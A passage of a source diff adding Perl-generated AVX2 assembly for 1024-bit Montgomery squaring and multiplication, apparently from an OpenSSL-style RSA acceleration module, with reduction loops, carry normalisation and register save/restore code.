+	vpaddq		$TEMP1, $ACC0, $ACC0
+	vpmuludq	32*5-128($aap), $B1, $TEMP2
+	vpaddq		$TEMP2, $ACC1, $ACC1
+	vpmuludq	32*6-128($aap), $B1, $TEMP0
+	vpaddq		$TEMP0, $ACC2, $ACC2
+	vpmuludq	32*7-128($aap), $B1, $ACC3
+	 vpbroadcastq	32*6-128($tpa), $B1
+	vpaddq		32*12-448($tp1), $ACC3, $ACC3
+
+	vmovdqu		$ACC8, 32*8-192($tp0)
+	vmovdqu		$ACC0, 32*9-192($tp0)
+	lea		8($tp0), $tp0
+
+	vpmuludq	32*5-128($ap), $B2, $TEMP2
+	vpaddq		$TEMP2, $ACC1, $ACC1
+	vpmuludq	32*5-128($aap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC2, $ACC2
+	vpmuludq	32*6-128($aap), $B2, $TEMP1
+	vpaddq		$TEMP1, $ACC3, $ACC3
+	vpmuludq	32*7-128($aap), $B2, $ACC4
+	 vpbroadcastq	32*7-128($tpa), $B2
+	vpaddq		32*13-448($tp1), $ACC4, $ACC4
+
+	vmovdqu		$ACC1, 32*10-448($tp1)
+	vmovdqu		$ACC2, 32*11-448($tp1)
+
+	vpmuludq	32*6-128($ap), $B1, $TEMP0
+	vpaddq		$TEMP0, $ACC3, $ACC3
+	vpmuludq	32*6-128($aap), $B1, $TEMP1
+	 vpbroadcastq	32*8-128($tpa), $ACC0		# borrow $ACC0 for $B1
+	vpaddq		$TEMP1, $ACC4, $ACC4
+	vpmuludq	32*7-128($aap), $B1, $ACC5
+	 vpbroadcastq	32*0+8-128($tpa), $B1		# for next iteration
+	vpaddq		32*14-448($tp1), $ACC5, $ACC5
+
+	vmovdqu		$ACC3, 32*12-448($tp1)
+	vmovdqu		$ACC4, 32*13-448($tp1)
+	lea		8($tpa), $tpa
+
+	vpmuludq	32*7-128($ap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC5, $ACC5
+	vpmuludq	32*7-128($aap), $B2, $ACC6
+	vpaddq		32*15-448($tp1), $ACC6, $ACC6
+
+	vpmuludq	32*8-128($ap), $ACC0, $ACC7
+	vmovdqu		$ACC5, 32*14-448($tp1)
+	vpaddq		32*16-448($tp1), $ACC7, $ACC7
+	vmovdqu		$ACC6, 32*15-448($tp1)
+	vmovdqu		$ACC7, 32*16-448($tp1)
+	lea		8($tp1), $tp1
+
+	dec	$i        
+	jnz	.LOOP_SQR_1024
+___
+$ZERO = $ACC9;
+$TEMP0 = $B1;
+$TEMP2 = $B2;
+$TEMP3 = $Y1;
+$TEMP4 = $Y2;
+$code.=<<___;
+	#we need to fix indexes 32-39 to avoid overflow
+	vmovdqu		32*8(%rsp), $ACC8		# 32*8-192($tp0),
+	vmovdqu		32*9(%rsp), $ACC1		# 32*9-192($tp0)
+	vmovdqu		32*10(%rsp), $ACC2		# 32*10-192($tp0)
+	lea		192(%rsp), $tp0			# 64+128=192
+
+	vpsrlq		\$29, $ACC8, $TEMP1
+	vpand		$AND_MASK, $ACC8, $ACC8
+	vpsrlq		\$29, $ACC1, $TEMP2
+	vpand		$AND_MASK, $ACC1, $ACC1
+
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpxor		$ZERO, $ZERO, $ZERO
+	vpermq		\$0x93, $TEMP2, $TEMP2
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC8, $ACC8
+	vpblendd	\$3, $TEMP2, $ZERO, $TEMP2
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vmovdqu		$ACC1, 32*9-192($tp0)
+	vmovdqu		$ACC2, 32*10-192($tp0)
+
+	mov	(%rsp), %rax
+	mov	8(%rsp), $r1
+	mov	16(%rsp), $r2
+	mov	24(%rsp), $r3
+	vmovdqu	32*1(%rsp), $ACC1
+	vmovdqu	32*2-192($tp0), $ACC2
+	vmovdqu	32*3-192($tp0), $ACC3
+	vmovdqu	32*4-192($tp0), $ACC4
+	vmovdqu	32*5-192($tp0), $ACC5
+	vmovdqu	32*6-192($tp0), $ACC6
+	vmovdqu	32*7-192($tp0), $ACC7
+
+	mov	%rax, $r0
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+	vmovd	%eax, $Y1
+
+	mov	%rax, %rdx
+	imulq	-128($np), %rax
+	 vpbroadcastq	$Y1, $Y1
+	add	%rax, $r0
+	mov	%rdx, %rax
+	imulq	8-128($np), %rax
+	shr	\$29, $r0
+	add	%rax, $r1
+	mov	%rdx, %rax
+	imulq	16-128($np), %rax
+	add	$r0, $r1
+	add	%rax, $r2
+	imulq	24-128($np), %rdx
+	add	%rdx, $r3
+
+	mov	$r1, %rax
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+
+	mov \$9, $i
+	jmp .LOOP_REDUCE_1024
+
+.align	32
+.LOOP_REDUCE_1024:
+	vmovd	%eax, $Y2
+	vpbroadcastq	$Y2, $Y2
+
+	vpmuludq	32*1-128($np), $Y1, $TEMP0
+	 mov	%rax, %rdx
+	 imulq	-128($np), %rax
+	vpaddq		$TEMP0, $ACC1, $ACC1
+	 add	%rax, $r1
+	vpmuludq	32*2-128($np), $Y1, $TEMP1
+	 mov	%rdx, %rax
+	 imulq	8-128($np), %rax
+	vpaddq		$TEMP1, $ACC2, $ACC2
+	vpmuludq	32*3-128($np), $Y1, $TEMP2
+	 .byte	0x67
+	 add	%rax, $r2
+	 .byte	0x67
+	 mov	%rdx, %rax
+	 imulq	16-128($np), %rax
+	 shr	\$29, $r1
+	vpaddq		$TEMP2, $ACC3, $ACC3
+	vpmuludq	32*4-128($np), $Y1, $TEMP0
+	 add	%rax, $r3
+	 add	$r1, $r2
+	vpaddq		$TEMP0, $ACC4, $ACC4
+	vpmuludq	32*5-128($np), $Y1, $TEMP1
+	 mov	$r2, %rax
+	 imull	$n0, %eax
+	vpaddq		$TEMP1, $ACC5, $ACC5
+	vpmuludq	32*6-128($np), $Y1, $TEMP2
+	 and	\$0x1fffffff, %eax
+	vpaddq		$TEMP2, $ACC6, $ACC6
+	vpmuludq	32*7-128($np), $Y1, $TEMP0
+	vpaddq		$TEMP0, $ACC7, $ACC7
+	vpmuludq	32*8-128($np), $Y1, $TEMP1
+	 vmovd	%eax, $Y1
+	 #vmovdqu	32*1-8-128($np), $TEMP2		# moved below
+	vpaddq		$TEMP1, $ACC8, $ACC8
+	 #vmovdqu	32*2-8-128($np), $TEMP0		# moved below
+	 vpbroadcastq	$Y1, $Y1
+
+	vpmuludq	32*1-8-128($np), $Y2, $TEMP2	# see above
+	vmovdqu		32*3-8-128($np), $TEMP1
+	 mov	%rax, %rdx
+	 imulq	-128($np), %rax
+	vpaddq		$TEMP2, $ACC1, $ACC1
+	vpmuludq	32*2-8-128($np), $Y2, $TEMP0	# see above
+	vmovdqu		32*4-8-128($np), $TEMP2
+	 add	%rax, $r2
+	 mov	%rdx, %rax
+	 imulq	8-128($np), %rax
+	vpaddq		$TEMP0, $ACC2, $ACC2
+	 add	$r3, %rax
+	 shr	\$29, $r2
+	vpmuludq	$Y2, $TEMP1, $TEMP1
+	vmovdqu		32*5-8-128($np), $TEMP0
+	 add	$r2, %rax
+	vpaddq		$TEMP1, $ACC3, $ACC3
+	vpmuludq	$Y2, $TEMP2, $TEMP2
+	vmovdqu		32*6-8-128($np), $TEMP1
+	 .byte	0x67
+	 mov	%rax, $r3
+	 imull	$n0, %eax
+	vpaddq		$TEMP2, $ACC4, $ACC4
+	vpmuludq	$Y2, $TEMP0, $TEMP0
+	.byte	0xc4,0x41,0x7e,0x6f,0x9d,0x58,0x00,0x00,0x00	# vmovdqu		32*7-8-128($np), $TEMP2
+	 and	\$0x1fffffff, %eax
+	vpaddq		$TEMP0, $ACC5, $ACC5
+	vpmuludq	$Y2, $TEMP1, $TEMP1
+	vmovdqu		32*8-8-128($np), $TEMP0
+	vpaddq		$TEMP1, $ACC6, $ACC6
+	vpmuludq	$Y2, $TEMP2, $TEMP2
+	vmovdqu		32*9-8-128($np), $ACC9
+	 vmovd	%eax, $ACC0			# borrow ACC0 for Y2
+	 imulq	-128($np), %rax
+	vpaddq		$TEMP2, $ACC7, $ACC7
+	vpmuludq	$Y2, $TEMP0, $TEMP0
+	 vmovdqu	32*1-16-128($np), $TEMP1
+	 vpbroadcastq	$ACC0, $ACC0
+	vpaddq		$TEMP0, $ACC8, $ACC8
+	vpmuludq	$Y2, $ACC9, $ACC9
+	 vmovdqu	32*2-16-128($np), $TEMP2
+	 add	%rax, $r3
+
+___
+($ACC0,$Y2)=($Y2,$ACC0);
+$code.=<<___;
+	 vmovdqu	32*1-24-128($np), $ACC0
+	vpmuludq	$Y1, $TEMP1, $TEMP1
+	vmovdqu		32*3-16-128($np), $TEMP0
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	 vpmuludq	$Y2, $ACC0, $ACC0
+	vpmuludq	$Y1, $TEMP2, $TEMP2
+	.byte	0xc4,0x41,0x7e,0x6f,0xb5,0xf0,0xff,0xff,0xff	# vmovdqu		32*4-16-128($np), $TEMP1
+	 vpaddq		$ACC1, $ACC0, $ACC0
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vpmuludq	$Y1, $TEMP0, $TEMP0
+	vmovdqu		32*5-16-128($np), $TEMP2
+	 .byte	0x67
+	 vmovq		$ACC0, %rax
+	 vmovdqu	$ACC0, (%rsp)		# transfer $r0-$r3
+	vpaddq		$TEMP0, $ACC3, $ACC3
+	vpmuludq	$Y1, $TEMP1, $TEMP1
+	vmovdqu		32*6-16-128($np), $TEMP0
+	vpaddq		$TEMP1, $ACC4, $ACC4
+	vpmuludq	$Y1, $TEMP2, $TEMP2
+	vmovdqu		32*7-16-128($np), $TEMP1
+	vpaddq		$TEMP2, $ACC5, $ACC5
+	vpmuludq	$Y1, $TEMP0, $TEMP0
+	vmovdqu		32*8-16-128($np), $TEMP2
+	vpaddq		$TEMP0, $ACC6, $ACC6
+	vpmuludq	$Y1, $TEMP1, $TEMP1
+	 shr	\$29, $r3
+	vmovdqu		32*9-16-128($np), $TEMP0
+	 add	$r3, %rax
+	vpaddq		$TEMP1, $ACC7, $ACC7
+	vpmuludq	$Y1, $TEMP2, $TEMP2
+	 #vmovdqu	32*2-24-128($np), $TEMP1	# moved below
+	 mov	%rax, $r0
+	 imull	$n0, %eax
+	vpaddq		$TEMP2, $ACC8, $ACC8
+	vpmuludq	$Y1, $TEMP0, $TEMP0
+	 and	\$0x1fffffff, %eax
+	 vmovd	%eax, $Y1
+	 vmovdqu	32*3-24-128($np), $TEMP2
+	.byte	0x67
+	vpaddq		$TEMP0, $ACC9, $ACC9
+	 vpbroadcastq	$Y1, $Y1
+
+	vpmuludq	32*2-24-128($np), $Y2, $TEMP1	# see above
+	vmovdqu		32*4-24-128($np), $TEMP0
+	 mov	%rax, %rdx
+	 imulq	-128($np), %rax
+	 mov	8(%rsp), $r1
+	vpaddq		$TEMP1, $ACC2, $ACC1
+	vpmuludq	$Y2, $TEMP2, $TEMP2
+	vmovdqu		32*5-24-128($np), $TEMP1
+	 add	%rax, $r0
+	 mov	%rdx, %rax
+	 imulq	8-128($np), %rax
+	 .byte	0x67
+	 shr	\$29, $r0
+	 mov	16(%rsp), $r2
+	vpaddq		$TEMP2, $ACC3, $ACC2
+	vpmuludq	$Y2, $TEMP0, $TEMP0
+	vmovdqu		32*6-24-128($np), $TEMP2
+	 add	%rax, $r1
+	 mov	%rdx, %rax
+	 imulq	16-128($np), %rax
+	vpaddq		$TEMP0, $ACC4, $ACC3
+	vpmuludq	$Y2, $TEMP1, $TEMP1
+	vmovdqu		32*7-24-128($np), $TEMP0
+	 imulq	24-128($np), %rdx		# future $r3
+	 add	%rax, $r2
+	 lea	($r0,$r1), %rax
+	vpaddq		$TEMP1, $ACC5, $ACC4
+	vpmuludq	$Y2, $TEMP2, $TEMP2
+	vmovdqu		32*8-24-128($np), $TEMP1
+	 mov	%rax, $r1
+	 imull	$n0, %eax
+	vpmuludq	$Y2, $TEMP0, $TEMP0
+	vpaddq		$TEMP2, $ACC6, $ACC5
+	vmovdqu		32*9-24-128($np), $TEMP2
+	 and	\$0x1fffffff, %eax
+	vpaddq		$TEMP0, $ACC7, $ACC6
+	vpmuludq	$Y2, $TEMP1, $TEMP1
+	 add	24(%rsp), %rdx
+	vpaddq		$TEMP1, $ACC8, $ACC7
+	vpmuludq	$Y2, $TEMP2, $TEMP2
+	vpaddq		$TEMP2, $ACC9, $ACC8
+	 vmovq	$r3, $ACC9
+	 mov	%rdx, $r3
+
+	dec	$i
+	jnz	.LOOP_REDUCE_1024
+___
+($ACC0,$Y2)=($Y2,$ACC0);
+$code.=<<___;
+	lea	448(%rsp), $tp1			# size optimization
+	vpaddq	$ACC9, $Y2, $ACC0
+	vpxor	$ZERO, $ZERO, $ZERO
+
+	vpaddq		32*9-192($tp0), $ACC0, $ACC0
+	vpaddq		32*10-448($tp1), $ACC1, $ACC1
+	vpaddq		32*11-448($tp1), $ACC2, $ACC2
+	vpaddq		32*12-448($tp1), $ACC3, $ACC3
+	vpaddq		32*13-448($tp1), $ACC4, $ACC4
+	vpaddq		32*14-448($tp1), $ACC5, $ACC5
+	vpaddq		32*15-448($tp1), $ACC6, $ACC6
+	vpaddq		32*16-448($tp1), $ACC7, $ACC7
+	vpaddq		32*17-448($tp1), $ACC8, $ACC8
+
+	vpsrlq		\$29, $ACC0, $TEMP1
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpsrlq		\$29, $ACC1, $TEMP2
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpsrlq		\$29, $ACC2, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpsrlq		\$29, $ACC3, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC3, $ACC3
+	vpermq		\$0x93, $TEMP3, $TEMP3
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP4, $TEMP4
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC0, $ACC0
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vpblendd	\$3, $TEMP4, $ZERO, $TEMP4
+	vpaddq		$TEMP3, $ACC3, $ACC3
+	vpaddq		$TEMP4, $ACC4, $ACC4
+
+	vpsrlq		\$29, $ACC0, $TEMP1
+	vpand		$AND_MASK, $ACC0, $ACC0
+	vpsrlq		\$29, $ACC1, $TEMP2
+	vpand		$AND_MASK, $ACC1, $ACC1
+	vpsrlq		\$29, $ACC2, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC2, $ACC2
+	vpsrlq		\$29, $ACC3, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC3, $ACC3
+	vpermq		\$0x93, $TEMP3, $TEMP3
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP4, $TEMP4
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC0, $ACC0
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vmovdqu		$ACC0, 32*0-128($rp)
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC2, $ACC2
+	vmovdqu		$ACC1, 32*1-128($rp)
+	vpblendd	\$3, $TEMP4, $ZERO, $TEMP4
+	vpaddq		$TEMP3, $ACC3, $ACC3
+	vmovdqu		$ACC2, 32*2-128($rp)
+	vpaddq		$TEMP4, $ACC4, $ACC4
+	vmovdqu		$ACC3, 32*3-128($rp)
+___
+$TEMP5=$ACC0;
+$code.=<<___;
+	vpsrlq		\$29, $ACC4, $TEMP1
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpsrlq		\$29, $ACC5, $TEMP2
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpsrlq		\$29, $ACC6, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpsrlq		\$29, $ACC7, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpsrlq		\$29, $ACC8, $TEMP5
+	vpermq		\$0x93, $TEMP3, $TEMP3
+	vpand		$AND_MASK, $ACC8, $ACC8
+	vpermq		\$0x93, $TEMP4, $TEMP4
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP5, $TEMP5
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC4, $ACC4
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC5, $ACC5
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC6, $ACC6
+	vpblendd	\$3, $TEMP4, $TEMP5, $TEMP4
+	vpaddq		$TEMP3, $ACC7, $ACC7
+	vpaddq		$TEMP4, $ACC8, $ACC8
+     
+	vpsrlq		\$29, $ACC4, $TEMP1
+	vpand		$AND_MASK, $ACC4, $ACC4
+	vpsrlq		\$29, $ACC5, $TEMP2
+	vpand		$AND_MASK, $ACC5, $ACC5
+	vpsrlq		\$29, $ACC6, $TEMP3
+	vpermq		\$0x93, $TEMP1, $TEMP1
+	vpand		$AND_MASK, $ACC6, $ACC6
+	vpsrlq		\$29, $ACC7, $TEMP4
+	vpermq		\$0x93, $TEMP2, $TEMP2
+	vpand		$AND_MASK, $ACC7, $ACC7
+	vpsrlq		\$29, $ACC8, $TEMP5
+	vpermq		\$0x93, $TEMP3, $TEMP3
+	vpand		$AND_MASK, $ACC8, $ACC8
+	vpermq		\$0x93, $TEMP4, $TEMP4
+
+	vpblendd	\$3, $ZERO, $TEMP1, $TEMP0
+	vpermq		\$0x93, $TEMP5, $TEMP5
+	vpblendd	\$3, $TEMP1, $TEMP2, $TEMP1
+	vpaddq		$TEMP0, $ACC4, $ACC4
+	vpblendd	\$3, $TEMP2, $TEMP3, $TEMP2
+	vpaddq		$TEMP1, $ACC5, $ACC5
+	vmovdqu		$ACC4, 32*4-128($rp)
+	vpblendd	\$3, $TEMP3, $TEMP4, $TEMP3
+	vpaddq		$TEMP2, $ACC6, $ACC6
+	vmovdqu		$ACC5, 32*5-128($rp)
+	vpblendd	\$3, $TEMP4, $TEMP5, $TEMP4
+	vpaddq		$TEMP3, $ACC7, $ACC7
+	vmovdqu		$ACC6, 32*6-128($rp)
+	vpaddq		$TEMP4, $ACC8, $ACC8
+	vmovdqu		$ACC7, 32*7-128($rp)
+	vmovdqu		$ACC8, 32*8-128($rp)
+
+	mov	$rp, $ap
+	dec	$rep
+	jne	.LOOP_GRANDE_SQR_1024
+
+	vzeroall
+	mov	%rbp, %rax
+___
+$code.=<<___ if ($win64);
+	movaps	-0xd8(%rax),%xmm6
+	movaps	-0xc8(%rax),%xmm7
+	movaps	-0xb8(%rax),%xmm8
+	movaps	-0xa8(%rax),%xmm9
+	movaps	-0x98(%rax),%xmm10
+	movaps	-0x88(%rax),%xmm11
+	movaps	-0x78(%rax),%xmm12
+	movaps	-0x68(%rax),%xmm13
+	movaps	-0x58(%rax),%xmm14
+	movaps	-0x48(%rax),%xmm15
+___
+$code.=<<___;
+	mov	-48(%rax),%r15
+	mov	-40(%rax),%r14
+	mov	-32(%rax),%r13
+	mov	-24(%rax),%r12
+	mov	-16(%rax),%rbp
+	mov	-8(%rax),%rbx
+	lea	(%rax),%rsp		# restore %rsp
+.Lsqr_1024_epilogue:
+	ret
+.size	rsaz_1024_sqr_avx2,.-rsaz_1024_sqr_avx2
+___
+}
+
+{ # void AMM_WW(
+my $rp="%rdi";	# BN_ULONG *rp,
+my $ap="%rsi";	# const BN_ULONG *ap,
+my $bp="%rdx";	# const BN_ULONG *bp,
+my $np="%rcx";	# const BN_ULONG *np,
+my $n0="%r8d";	# unsigned int n0);
+
+# The registers that hold the accumulated redundant result
+# The AMM works on 1024 bit operands, and redundant word size is 29
+# Therefore: ceil(1024/29)/4 = 9
+my $ACC0="%ymm0";
+my $ACC1="%ymm1";
+my $ACC2="%ymm2";
+my $ACC3="%ymm3";
+my $ACC4="%ymm4";
+my $ACC5="%ymm5";
+my $ACC6="%ymm6";
+my $ACC7="%ymm7";
+my $ACC8="%ymm8";
+my $ACC9="%ymm9";
+
+# Registers that hold the broadcasted words of multiplier, currently used
+my $Bi="%ymm10";
+my $Yi="%ymm11";
+
+# Helper registers
+my $TEMP0=$ACC0;
+my $TEMP1="%ymm12";
+my $TEMP2="%ymm13";
+my $ZERO="%ymm14";
+my $AND_MASK="%ymm15";
+
+# alu registers that hold the first words of the ACC
+my $r0="%r9";
+my $r1="%r10";
+my $r2="%r11";
+my $r3="%r12";
+
+my $i="%r14d";
+my $tmp="%r15";
+
+$bp="%r13";	# reassigned argument
+
+$code.=<<___;
+.globl	rsaz_1024_mul_avx2
+.type	rsaz_1024_mul_avx2,\@function,5
+.align	64
+rsaz_1024_mul_avx2:
+	lea	(%rsp), %rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+___
+$code.=<<___ if ($win64);
+	vzeroupper
+	lea	-0xa8(%rsp),%rsp
+	vmovaps	%xmm6,-0xd8(%rax)
+	vmovaps	%xmm7,-0xc8(%rax)
+	vmovaps	%xmm8,-0xb8(%rax)
+	vmovaps	%xmm9,-0xa8(%rax)
+	vmovaps	%xmm10,-0x98(%rax)
+	vmovaps	%xmm11,-0x88(%rax)
+	vmovaps	%xmm12,-0x78(%rax)
+	vmovaps	%xmm13,-0x68(%rax)
+	vmovaps	%xmm14,-0x58(%rax)
+	vmovaps	%xmm15,-0x48(%rax)
+.Lmul_1024_body:
+___
+$code.=<<___;
+	mov	%rax,%rbp
+	vzeroall
+	mov	%rdx, $bp	# reassigned argument
+	sub	\$64,%rsp
+
+	# unaligned 256-bit load that crosses page boundary can
+	# cause severe performance degradation here, so if $ap does
+	# cross page boundary, swap it with $bp [meaning that caller
+	# is advised to lay down $ap and $bp next to each other, so
+	# that only one can cross page boundary].
+	.byte	0x67,0x67
+	mov	$ap, $tmp
+	and	\$4095, $tmp
+	add	\$32*10, $tmp
+	shr	\$12, $tmp
+	mov	$ap, $tmp
+	cmovnz	$bp, $ap
+	cmovnz	$tmp, $bp
+
+	mov	$np, $tmp
+	sub	\$-128,$ap	# size optimization
+	sub	\$-128,$np
+	sub	\$-128,$rp
+
+	and	\$4095, $tmp	# see if $np crosses page
+	add	\$32*10, $tmp
+	.byte	0x67,0x67
+	shr	\$12, $tmp
+	jz	.Lmul_1024_no_n_copy
+
+	# unaligned 256-bit load that crosses page boundary can
+	# cause severe performance degradation here, so if $np does
+	# cross page boundary, copy it to stack and make sure stack
+	# frame doesn't...
+	sub		\$32*10,%rsp
+	vmovdqu		32*0-128($np), $ACC0
+	and		\$-512, %rsp
+	vmovdqu		32*1-128($np), $ACC1
+	vmovdqu		32*2-128($np), $ACC2
+	vmovdqu		32*3-128($np), $ACC3
+	vmovdqu		32*4-128($np), $ACC4
+	vmovdqu		32*5-128($np), $ACC5
+	vmovdqu		32*6-128($np), $ACC6
+	vmovdqu		32*7-128($np), $ACC7
+	vmovdqu		32*8-128($np), $ACC8
+	lea		64+128(%rsp),$np
+	vmovdqu		$ACC0, 32*0-128($np)
+	vpxor		$ACC0, $ACC0, $ACC0
+	vmovdqu		$ACC1, 32*1-128($np)
+	vpxor		$ACC1, $ACC1, $ACC1
+	vmovdqu		$ACC2, 32*2-128($np)
+	vpxor		$ACC2, $ACC2, $ACC2
+	vmovdqu		$ACC3, 32*3-128($np)
+	vpxor		$ACC3, $ACC3, $ACC3
+	vmovdqu		$ACC4, 32*4-128($np)
+	vpxor		$ACC4, $ACC4, $ACC4
+	vmovdqu		$ACC5, 32*5-128($np)
+	vpxor		$ACC5, $ACC5, $ACC5
+	vmovdqu		$ACC6, 32*6-128($np)
+	vpxor		$ACC6, $ACC6, $ACC6
+	vmovdqu		$ACC7, 32*7-128($np)
+	vpxor		$ACC7, $ACC7, $ACC7
+	vmovdqu		$ACC8, 32*8-128($np)
+	vmovdqa		$ACC0, $ACC8
+	vmovdqu		$ACC9, 32*9-128($np)	# $ACC9 is zero after vzeroall
+.Lmul_1024_no_n_copy:
+	and	\$-64,%rsp
+
+	mov	($bp), %rbx
+	vpbroadcastq ($bp), $Bi
+	vmovdqu	$ACC0, (%rsp)			# clear top of stack
+	xor	$r0, $r0
+	.byte	0x67
+	xor	$r1, $r1
+	xor	$r2, $r2
+	xor	$r3, $r3
+
+	vmovdqu	.Land_mask(%rip), $AND_MASK
+	mov	\$9, $i
+	vmovdqu	$ACC9, 32*9-128($rp)		# $ACC9 is zero after vzeroall
+	jmp	.Loop_mul_1024
+
+.align	32
+.Loop_mul_1024:
+	 vpsrlq		\$29, $ACC3, $ACC9		# correct $ACC3(*)
+	mov	%rbx, %rax
+	imulq	-128($ap), %rax
+	add	$r0, %rax
+	mov	%rbx, $r1
+	imulq	8-128($ap), $r1
+	add	8(%rsp), $r1
+
+	mov	%rax, $r0
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+
+	 mov	%rbx, $r2
+	 imulq	16-128($ap), $r2
+	 add	16(%rsp), $r2
+
+	 mov	%rbx, $r3
+	 imulq	24-128($ap), $r3
+	 add	24(%rsp), $r3
+	vpmuludq	32*1-128($ap),$Bi,$TEMP0
+	 vmovd		%eax, $Yi
+	vpaddq		$TEMP0,$ACC1,$ACC1
+	vpmuludq	32*2-128($ap),$Bi,$TEMP1
+	 vpbroadcastq	$Yi, $Yi
+	vpaddq		$TEMP1,$ACC2,$ACC2
+	vpmuludq	32*3-128($ap),$Bi,$TEMP2
+	 vpand		$AND_MASK, $ACC3, $ACC3		# correct $ACC3
+	vpaddq		$TEMP2,$ACC3,$ACC3
+	vpmuludq	32*4-128($ap),$Bi,$TEMP0
+	vpaddq		$TEMP0,$ACC4,$ACC4
+	vpmuludq	32*5-128($ap),$Bi,$TEMP1
+	vpaddq		$TEMP1,$ACC5,$ACC5
+	vpmuludq	32*6-128($ap),$Bi,$TEMP2
+	vpaddq		$TEMP2,$ACC6,$ACC6
+	vpmuludq	32*7-128($ap),$Bi,$TEMP0
+	 vpermq		\$0x93, $ACC9, $ACC9		# correct $ACC3
+	vpaddq		$TEMP0,$ACC7,$ACC7
+	vpmuludq	32*8-128($ap),$Bi,$TEMP1
+	 vpbroadcastq	8($bp), $Bi
+	vpaddq		$TEMP1,$ACC8,$ACC8
+
+	mov	%rax,%rdx
+	imulq	-128($np),%rax
+	add	%rax,$r0
+	mov	%rdx,%rax
+	imulq	8-128($np),%rax
+	add	%rax,$r1
+	mov	%rdx,%rax
+	imulq	16-128($np),%rax
+	add	%rax,$r2
+	shr	\$29, $r0
+	imulq	24-128($np),%rdx
+	add	%rdx,$r3
+	add	$r0, $r1
+
+	vpmuludq	32*1-128($np),$Yi,$TEMP2
+	 vmovq		$Bi, %rbx
+	vpaddq		$TEMP2,$ACC1,$ACC1
+	vpmuludq	32*2-128($np),$Yi,$TEMP0
+	vpaddq		$TEMP0,$ACC2,$ACC2
+	vpmuludq	32*3-128($np),$Yi,$TEMP1
+	vpaddq		$TEMP1,$ACC3,$ACC3
+	vpmuludq	32*4-128($np),$Yi,$TEMP2
+	vpaddq		$TEMP2,$ACC4,$ACC4
+	vpmuludq	32*5-128($np),$Yi,$TEMP0
+	vpaddq		$TEMP0,$ACC5,$ACC5
+	vpmuludq	32*6-128($np),$Yi,$TEMP1
+	vpaddq		$TEMP1,$ACC6,$ACC6
+	vpmuludq	32*7-128($np),$Yi,$TEMP2
+	 vpblendd	\$3, $ZERO, $ACC9, $ACC9	# correct $ACC3
+	vpaddq		$TEMP2,$ACC7,$ACC7
+	vpmuludq	32*8-128($np),$Yi,$TEMP0
+	 vpaddq		$ACC9, $ACC3, $ACC3		# correct $ACC3
+	vpaddq		$TEMP0,$ACC8,$ACC8
+
+	mov	%rbx, %rax
+	imulq	-128($ap),%rax
+	add	%rax,$r1
+	 vmovdqu	-8+32*1-128($ap),$TEMP1
+	mov	%rbx, %rax
+	imulq	8-128($ap),%rax
+	add	%rax,$r2
+	 vmovdqu	-8+32*2-128($ap),$TEMP2
+
+	mov	$r1, %rax
+	imull	$n0, %eax
+	and	\$0x1fffffff, %eax
+
+	 imulq	16-128($ap),%rbx
+	 add	%rbx,$r3
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	 vmovd		%eax, $Yi
+	vmovdqu		-8+32*3-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC1,$ACC1
+	vpmuludq	$Bi,$TEMP2,$TEMP2
+	 vpbroadcastq	$Yi, $Yi
+	vmovdqu		-8+32*4-128($ap),$TEMP1
+	vpaddq		$TEMP2,$ACC2,$ACC2
+	vpmuludq	$Bi,$TEMP0,$TEMP0
+	vmovdqu		-8+32*5-128($ap),$TEMP2
+	vpaddq		$TEMP0,$ACC3,$ACC3
+	vpmuludq	$Bi,$TEMP1,$TEMP1
+	vmovdqu		-8+32*6-128($ap),$TEMP0
+	vpaddq		$TEMP1,$ACC4,$ACC4
